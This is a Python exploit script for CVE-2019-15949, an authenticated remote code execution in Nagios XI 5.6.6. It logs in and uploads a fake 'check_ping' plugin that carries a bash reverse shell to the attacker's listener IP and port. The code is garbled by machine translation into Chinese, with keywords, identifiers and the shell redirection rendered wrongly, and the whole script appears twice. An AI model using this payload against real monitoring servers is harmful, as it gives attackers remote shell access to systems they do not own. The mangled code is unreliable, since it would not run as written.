#利用标题: Nagiosxi身份验证的远程代码执行
#date: 17/02/2024
#利用作者: Calil Khalil
#供应商homepage: https://www.nagios.com/products/nagios-xi/
#版本: Nagios XI 5.6.6
#在: Ubuntu上测试
#CVE : CVE-2019-15949
#
#python3 exp.py -t https://target/-b/nagiosxi -path/-u用户-p'密码'-lh rev -ip -lp -lp rev -port -k(imagore cert)
#
导入argparse
导入
导入请求
导入urllib3
nagiosxi类():
def __init __(自我,目标,参数,用户名,密码,lhost,lport,ignore_ssl):
self.url=目标
self.parameter=参数
self.username=用户名
self.password=密码
self.lhost=lhost
self.lport=LPORT
self.ignore_ssl=ignore_ssl
self.login()
def上传(self,session):
打印(“上传恶意检查ping插件”)
upload_url=self.url + self.parameter +'/admin/monitoringplugins.php'
upload_token=session.get(upload_url,verify=not self.ignore_ssl)
nsp=re.findall('var nsp_str='(。*)';',upload_token.text)
打印('上传NSP Token:' + NSP [0])
有效载荷='bash -c'bash -i/dev/tcp/' + self.lhost +'/' + self.lport +'01'''
file_data={
'upload':'1',
'NSP': NSP [0],
'max_file_size':'20000000'
}
file_upload={
'uploadedfile':('check_ping',有效载荷,'application/octet-stream',{'content-disposition':':'form-data'})
}
session.post(upload_url,data=file_data,files=file_upload,verify=not self.ignore_ssl)
payload_url=self.url + self.parameter +'/includes/components/profile/profile.php?cmd=download'
session.get(payload_url,verify=not self.ignore_ssl)
def登录(自我):
session=requests.session()
login_url=self.url + self.parameter +'/login.php'
token=session.get(login_url,verify=not self.ignore_ssl)
nsp=re.findall('name='nsp'value='(。*)'',token.text)
打印('login nsp token:' + nsp [0])
post_data={
'NSP': NSP [0],
'page':'auth',
'debug':'',
'pageopt':'登录',
'redirect':'',
'username': self.username,
'password': self.password,
'loginbutton':''
}
login=session.post(login_url,data=post_data,verify=not self.ignore_ssl)
如果登录中的“主仪表板”
打印('登录!')
其他:
打印(“无法登录!”)
self.upload(会话)
如果name=='__ -Main __':
parser=argparse.argumentparser(description='cve-2019–15949 nagiosxi身份验证远程代码执行')
parser.add_argument(' - t',metavar='目标基础url',help='example: -t http://nagios.url/',必需=true)
parser.add_argument(' - b',metavar='base Directory',help='example: -b /nagiosxi /',必需=true)
parser.add_argument(' - u',metavar='username',help='example: -a用户名',必需=true)
parser.add_argument(' - p',metavar='密码',help='example: -p'密码',必需=true)
parser.add_argument(' - lh',metavar='侦听器ip',help='example: -lh 127.0.0.0.1',必需=true)
parser.add_argument(' - lp',metavar='listerer port',help='example: -lp 1337',必需=true)
parser.add_argument(' - k',action='store_true',help='忽略ssl证书验证')
args=parser.parse_args()
urllib3.disable_warnings()
TRY:
打印('CVE-2019-15949 Nagiosxi身份验证的远程代码执行')
nagiosxi(args.t,args.b,args.u,args.p,args.lh,args.lp,args.k)
除了键盘Interrupt:
打印('\ nbye bye!')
出口()
#date: 17/02/2024
#利用作者: Calil Khalil
#供应商homepage: https://www.nagios.com/products/nagios-xi/
#版本: Nagios XI 5.6.6
#在: Ubuntu上测试
#CVE : CVE-2019-15949
#
#python3 exp.py -t https://target/-b/nagiosxi -path/-u用户-p'密码'-lh rev -ip -lp -lp rev -port -k(imagore cert)
#
导入argparse
导入
导入请求
导入urllib3
nagiosxi类():
def __init __(自我,目标,参数,用户名,密码,lhost,lport,ignore_ssl):
self.url=目标
self.parameter=参数
self.username=用户名
self.password=密码
self.lhost=lhost
self.lport=LPORT
self.ignore_ssl=ignore_ssl
self.login()
def上传(self,session):
打印(“上传恶意检查ping插件”)
upload_url=self.url + self.parameter +'/admin/monitoringplugins.php'
upload_token=session.get(upload_url,verify=not self.ignore_ssl)
nsp=re.findall('var nsp_str='(。*)';',upload_token.text)
打印('上传NSP Token:' + NSP [0])
有效载荷='bash -c'bash -i/dev/tcp/' + self.lhost +'/' + self.lport +'01'''
file_data={
'upload':'1',
'NSP': NSP [0],
'max_file_size':'20000000'
}
file_upload={
'uploadedfile':('check_ping',有效载荷,'application/octet-stream',{'content-disposition':':'form-data'})
}
session.post(upload_url,data=file_data,files=file_upload,verify=not self.ignore_ssl)
payload_url=self.url + self.parameter +'/includes/components/profile/profile.php?cmd=download'
session.get(payload_url,verify=not self.ignore_ssl)
def登录(自我):
session=requests.session()
login_url=self.url + self.parameter +'/login.php'
token=session.get(login_url,verify=not self.ignore_ssl)
nsp=re.findall('name='nsp'value='(。*)'',token.text)
打印('login nsp token:' + nsp [0])
post_data={
'NSP': NSP [0],
'page':'auth',
'debug':'',
'pageopt':'登录',
'redirect':'',
'username': self.username,
'password': self.password,
'loginbutton':''
}
login=session.post(login_url,data=post_data,verify=not self.ignore_ssl)
如果登录中的“主仪表板”
打印('登录!')
其他:
打印(“无法登录!”)
self.upload(会话)
如果name=='__ -Main __':
parser=argparse.argumentparser(description='cve-2019–15949 nagiosxi身份验证远程代码执行')
parser.add_argument(' - t',metavar='目标基础url',help='example: -t http://nagios.url/',必需=true)
parser.add_argument(' - b',metavar='base Directory',help='example: -b /nagiosxi /',必需=true)
parser.add_argument(' - u',metavar='username',help='example: -a用户名',必需=true)
parser.add_argument(' - p',metavar='密码',help='example: -p'密码',必需=true)
parser.add_argument(' - lh',metavar='侦听器ip',help='example: -lh 127.0.0.0.1',必需=true)
parser.add_argument(' - lp',metavar='listerer port',help='example: -lp 1337',必需=true)
parser.add_argument(' - k',action='store_true',help='忽略ssl证书验证')
args=parser.parse_args()
urllib3.disable_warnings()
TRY:
打印('CVE-2019-15949 Nagiosxi身份验证的远程代码执行')
nagiosxi(args.t,args.b,args.u,args.p,args.lh,args.lp,args.k)
除了键盘Interrupt:
打印('\ nbye bye!')
出口()